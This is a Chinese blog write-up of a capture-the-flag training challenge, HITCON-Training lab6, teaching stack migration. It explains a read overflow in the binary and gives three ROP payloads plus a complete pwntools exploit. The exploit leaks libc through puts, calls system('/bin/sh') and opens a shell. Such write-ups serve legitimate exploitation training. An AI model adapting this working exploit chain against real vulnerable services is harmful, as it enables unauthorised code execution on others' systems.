0x00:前言
栈转移(stack immigration)主要是为了解决栈溢出可以溢出空间大小不足的问题,HITCON-Training-master 的 lab6 就是用的这个原理,我们来实践一下这道题目。
0x01:实例
题目链接:
https://github.com/scwuaptx/HITCON-Training/blob/master/LAB/lab6/migration
运行一下程序,结构很简单,接受完输入就退出,保护开启了堆栈不可执行
Thunder_J@Thunder_J-virtual-machine:~/桌面$ ./migration
Try your best :
aaaa
Thunder_J@Thunder_J-virtual-machine:~/桌面$ checksec migration
[*] '/home/Thunder_J/\xe6\xa1\x8c\xe9\x9d\xa2/migration'
Arch: i386-32-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
放入IDA分析一下,漏洞很明显,read函数读 0x40 的大小,buf的大小只有0x28,我们可以利用0x40 - 0x28 = 0x18 的大小
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf; // [esp+0h] [ebp-28h]
if ( count != 1337 )
exit(1);
++count;
setvbuf(_bss_start, 0, 2, 0);
puts("Try your best :");
return read(0, &buf, 0x40u);
}
题目的意思是让我们转移栈,我们可以通过改变ebp的值,再执行 leave ret 来实现对栈的转移,我们一共分三次 payload 发送,首先第一次我们将偏移找好,将ebp转移到bss+0x500处,然后调用read函数实现写bss+0x500处的内容,也就是payload2的内容
# mov stack to bss + 0x500
payload1 = 'a'*40 + p32(elf.bss() + 0x500) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(buf) +p32(0x100)
第二次payload我们通过泄露puts函数的地址计算出libc的基地址,然后调用read函数写bss+0x400处的内容,也就是payload3的内容
# leak libc
payload2 = p32(buf2) + p32(puts_plt) + p32(pop_ebx) + p32(puts_got) + p32(read_plt) + p32(leave_ret)
payload2 += p32(0) + p32(buf2) + p32(0x100)
payload3的内容就更加清晰了,直接调用system("\bin\sh")来getshell
payload3 = p32(buf) + p32(system_addr) + 'bbbb' + p32(binsh)
总结来说就是因为溢出我们可以利用的内容太小了,必须进行栈转移,转移到可以执行的地址来写我们的shellcode,把一个shellcode一步一步分开来写,最后getshell,总的exp如下:
from pwn import *
context.log_level = 'debug'
r = remote('127.0.0.1',4000)
#r = process('./migration')
lib = ELF('/lib32/libc.so.6')
elf = ELF('./migration')
read_plt = elf.symbols['read']
puts_plt = elf.symbols['puts']
read_got = elf.got['read']
puts_got = elf.got['puts']
puts_lib = lib.symbols['puts']
system_lib = lib.symbols['system']
buf = elf.bss() + 0x500
buf2 = elf.bss() + 0x400
pop_ebx = 0x0804836d
leave_ret = 0x08048418
r.recvuntil(':\n')
# mov stack to bss + 0x500
payload1 = 'a'*40 + p32(buf) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(buf) +p32(0x100)
r.send(payload1)
sleep(0.1)
# leak libc
payload2 = p32(buf2) + p32(puts_plt) + p32(pop_ebx) + p32(puts_got) + p32(read_plt) + p32(leave_ret)
payload2 += p32(0) + p32(buf2) + p32(0x100)
r.send(payload2)
sleep(0.1)
puts_addr = u32(r.recv(4))
print "puts_addr:" + hex(puts_addr)
libc_base = puts_addr - puts_lib
print "libc base is " + hex(libc_base)
system_addr = libc_base + system_lib
binsh_libc = lib.search("/bin/sh").next()
binsh = binsh_libc + libc_base
payload3 = p32(buf) + p32(system_addr) + 'bbbb' + p32(binsh)
r.send(payload3)
sleep(0.1)
r.interactive()
0x02:总结
这种方法利用的地方比较奇特,还是需要多加锻炼
参考链接:
https://blog.csdn.net/zszcr/article/details/79841848
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
